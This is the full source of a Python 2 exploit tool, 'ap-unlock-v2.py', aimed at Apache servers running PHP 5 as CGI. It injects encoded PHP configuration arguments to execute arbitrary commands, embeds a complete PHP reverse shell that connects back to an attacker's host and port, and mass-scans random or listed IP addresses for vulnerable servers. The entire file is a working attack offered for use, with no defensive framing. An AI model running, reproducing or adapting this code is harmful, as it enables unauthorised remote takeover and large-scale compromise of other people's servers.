/
hack.py
344 lines (309 loc) · 12.4 KB
/
hack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
#!/usr/bin/env python
#
# ap-unlock-v2.py - apache + php 5.* rem0te c0de execution 0day (better version)
#
# NOTE:
# - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :(((
# - for connect back shell start netcat/nc and bind port on given host:port
# - is ip-range scanner not is multithreaded, but iz multithreaded iz in
# random scanner and is scanner from file (greets to MustLive)
# - no ssl support
# - more php paths can be added
# - adjust this shit for windows b0xes
#
# 2013
# by noptrix - http://nullsecurity.net/
import sys
import socket
import argparse
import threading
import time
import random
import select
NONE = 0
VULN = 1
SCMD = 2
XPLT = 3
t3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \
'%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \
'%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \
'%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\
'%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\
'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n'
def m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt):
c0nn_b4ck = \
'''
<? set_time_limit (0); $VERSION = "1.0"; $ip = "''' + cb_h0st + '''";
$port = ''' + cb_p0rt + '''; $chunk_size = 1400; $write_a = null;
$error_a = null; $shell = "unset HISTFILE; id; /bin/sh -i"; $daemon = 0;
$debug = 0; if (function_exists("pcntl_fork")) {$pid = pcntl_fork();
if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {
exit(1);}$daemon = 1;} else {print "bla";}chdir("/");umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {
printit("$errstr ($errno)");exit(1);}$descriptorspec = array(
0 => array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");while (1) {
if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}
if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}
if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);
fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);
function printit ($string) {if (!$daemon) {print "$string\n";}}?>
'''
return c0nn_b4ck
def enc0dez():
n33dz1 = ('cgi-bin', 'php')
n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d',
'suhosin.simulation=on', '-d', 'disable_functions=""', '-d',
'open_basedir=none', '-d', 'auto_prepend_file=php://input',
'-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0',
'-d', 'auto_prepend_file=php://input', '-n')
fl4g = 0
arg5 = ''
p4th = ''
plus = ''
for x in n33dz2:
if fl4g == 1:
plus = '+'
arg5 = arg5 + plus + \
''.join('%' + c.encode('utf-8').encode('hex') for c in x)
fl4g = 1
for x in n33dz1:
p4th = p4th + '/' + \
''.join('%' + c.encode('utf-8').encode('hex') for c in x)
return (p4th.upper(), arg5.upper())
def m4k3_p4yl0rd(p4yl0rd, m0de):
p4th, arg5 = enc0dez()
if m0de == VULN:
p4yl0rd = t3st
elif m0de == SCMD or m0de == XPLT:
p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\r\n' \
'Host: ' + sys.argv[1] + '\r\n' \
'Content-Type: application/x-www-form-urlencoded\r\n' \
'Content-Length: ' + str(len(p4yl0rd)) + '\r\n\r\n' + p4yl0rd
return p4yl0rd
def s3nd_sh1t(args, m0de, c0nn_b4ck):
pat = '<b>Parse error</b>:'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(float(args.t))
res = s.connect_ex((args.h, int(args.p)))
if res == 0:
if m0de == VULN:
p4yl0rd = m4k3_p4yl0rd('', m0de)
s.sendall(p4yl0rd)
if pat in s.recv(4096):
print "--> " + args.h + " vu1n"
return args.h
else:
if args.v:
print "--> %s n0t vu1n" % (args.h)
return
elif m0de == SCMD:
p4yl0rd = m4k3_p4yl0rd('<? system("' + args.c + '"); ?>', m0de)
s.sendall(p4yl0rd)
rd, wd, ex = select.select([s], [], [], float(args.t))
if rd:
for line in s.makefile():
print line,
elif m0de == XPLT:
p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de)
s.sendall(p4yl0rd)
else:
if args.v:
print "--> n0 w3bs3rv3r 0n %s" % (args.h)
except socket.error:
return
return
def m4k3_r4nd_1p4ddr(num):
h0sts = []
for x in range(int(num)):
h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255),
random.randrange(0,255), random.randrange(0,255),
random.randrange(0,255)))
return h0sts
def sc4n_r4nd0m(args, h0st, m0de, vu1nz):
args.h = h0st
vu1nz.append(s3nd_sh1t(args, m0de, None))
vu1nz = filter(None, vu1nz)
return
def sc4n_fr0m_f1le(args, h0st, m0de, vu1nz):
args.h = h0st.rstrip()
vu1nz.append(s3nd_sh1t(args, m0de, None))
vu1nz = filter(None, vu1nz)
return
def sc4n_r4ng3(rsa, rsb, args, m0de):
vu1nz = []
for i in range (rsa[0], rsb[0]):
for j in range (rsa[1], rsb[1]):
for k in range (rsa[2], rsb[2]):
for l in range(rsa[3], rsb[3]):
args.h = str(i) + "." + str(j) + "." + str(k) + "." + str(l)
vu1nz.append(s3nd_sh1t(args, m0de, None))
time.sleep(0.005)
vu1nz = filter(None, vu1nz)
return vu1nz
def m4k3_ipv4_r4ng3(iprange):
a = tuple(part for part in iprange.split('.'))
rsa = (range(4))
rsb = (range(4))
for i in range(0,4):
ga = a[i].find('-')
if ga != -1:
rsa[i] = int(a[i][:ga])
rsb[i] = int(a[i][1+ga:]) + 1
else:
rsa[i] = int(a[i])
rsb[i] = int(a[i]) + 1
return (rsa, rsb)
def parse_args():
p = argparse.ArgumentParser(
usage='\n\n ./ap-unlock-v2.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]'\
'\n ./ap-unlock-v2.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]',
formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)
opts = p.add_argument_group('0pt1ons', '')
opts.add_argument('-h', metavar='wh1t3h4tz.0rg',
help='| t3st s1ngle h0st f0r vu1n')
opts.add_argument('-p', default=80, metavar='80',
help='| t4rg3t p0rt (d3fau1t: 80)')
opts.add_argument('-c', metavar='\'uname -a;id\'',
help='| s3nd c0mm4nds t0 h0st')
opts.add_argument('-x', metavar='192.168.0.2:1337',
help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll')
opts.add_argument('-s', action='store_true',
help='| t3st s1ngl3 h0st f0r vu1n')
opts.add_argument('-r', metavar='133.1.3-7.7-37',
help='| sc4nz iP addr3ss r4ng3 f0r vu1n')
opts.add_argument('-R', metavar='1337',
help='| sc4nz num r4nd0m h0st5 f0r vu1n')
opts.add_argument('-t', default=3, metavar='3',
help='| t1me0ut in s3x (d3fau1t: 3)')
opts.add_argument('-f', metavar='vu1n.lst',
help='| wr1t3 vu1n h0sts t0 f1l3')
opts.add_argument('-i', metavar='sc4nz.lst',
help='| sc4nz h0sts fr0m f1le f0r vu1n')
opts.add_argument('-S', metavar='2',
help='| sl33pz in s3x b3tw33n thr3adz (d3fault: 2)')
opts.add_argument('-T', default=2, metavar='4',
help='| nuM sc4n thr3adz (d3fault: 4)')
opts.add_argument('-v', action='store_true',
help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng')
args = p.parse_args()
if not args.h and not args.r and not args.R and not args.i:
p.print_help()
sys.exit(0)
return args
def wr1te_fil3(args, vu1nz):
if args.f:
if vu1nz:
try:
f = open(args.f, "w")
f.write("\n".join(vu1nz)+"\n")
f.close()
except:
sys.stderr.write('de1n3 mudd1 k0cht guT')
sys.stderr.write('\n')
raise SystemExit()
return
def c0ntr0ller():
vu1nz = []
m0de = NONE
try:
args = parse_args()
if not args.t:
args.t = float(3)
if args.h:
if args.s:
print "[+] sc4nn1ng s1ngl3 h0st %s " % (args.h)
m0de = VULN
s3nd_sh1t(args, m0de, None)
elif args.c:
print "[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h)
m0de = SCMD
s3nd_sh1t(args, m0de, None)
elif args.x:
print "[+] xpl0it1ng b0x %s " % (args.h)
m0de = XPLT
if args.x.find(':') != -1:
if not args.x.split(':')[1]:
print "[-] 3rr0r: p0rt m1ss1ng"
else:
cb_h0st = args.x.split(':')[0]
cb_p0rt = args.x.split(':')[1]
else:
print "[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r"
c0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt)
s3nd_sh1t(args, m0de, c0nn_b4ck)
else:
print "[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch"
sys.exit(-1)
if args.r:
print "[+] sc4nn1ng r4ng3 %s " % (args.r)
m0de = VULN
rsa, rsb = m4k3_ipv4_r4ng3(args.r)
vu1nz = sc4n_r4ng3(rsa, rsb, args, m0de)
if args.R:
print "[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R))
m0de = VULN
if not args.S:
args.S = float(2)
h0sts = m4k3_r4nd_1p4ddr(int(args.R))
for h0st in h0sts:
try:
t = threading.Thread(target=sc4n_r4nd0m, args=(args, h0st,
m0de, vu1nz))
t.start()
time.sleep(float(args.S))
while threading.activeCount() > int(args.T):
time.sleep(2)
except:
sys.stdout.flush()
sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
raise SystemExit
if args.i:
print "[+] sc4nn1ng b0xes fr0m f1le %s" % (args.i)
m0de = VULN
h0sts = tuple(open(args.i, 'r'))
if not args.S:
args.S = float(2)
for h0st in h0sts:
try:
t = threading.Thread(target=sc4n_fr0m_f1le, args=(args,
h0st, m0de, vu1nz))
t.start()
time.sleep(float(args.S))
while threading.activeCount() > int(args.T):
time.sleep(2)
except KeyboardInterrupt:
sys.stdout.flush()
sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
raise SystemExit
#sc4n_fr0m_f1le(args, h0sts, m0de, vu1nz)
except KeyboardInterrupt:
sys.stdout.flush()
sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
raise SystemExit
wr1te_fil3(args, vu1nz)
return
def m41n():
if __name__ == "__main__":
print "--==[ ap-unlock-v2.py by noptrix@nullsecurity.net ]==--"
c0ntr0ller()
else:
print "[-] 3rr0r: y0u fuck3d up dud3"
sys.exit(1)
print "[+] h0p3 1t h3lp3d"
# \o/ fr33 requiem 1337 h4x0rs ...
m41n()
# e0F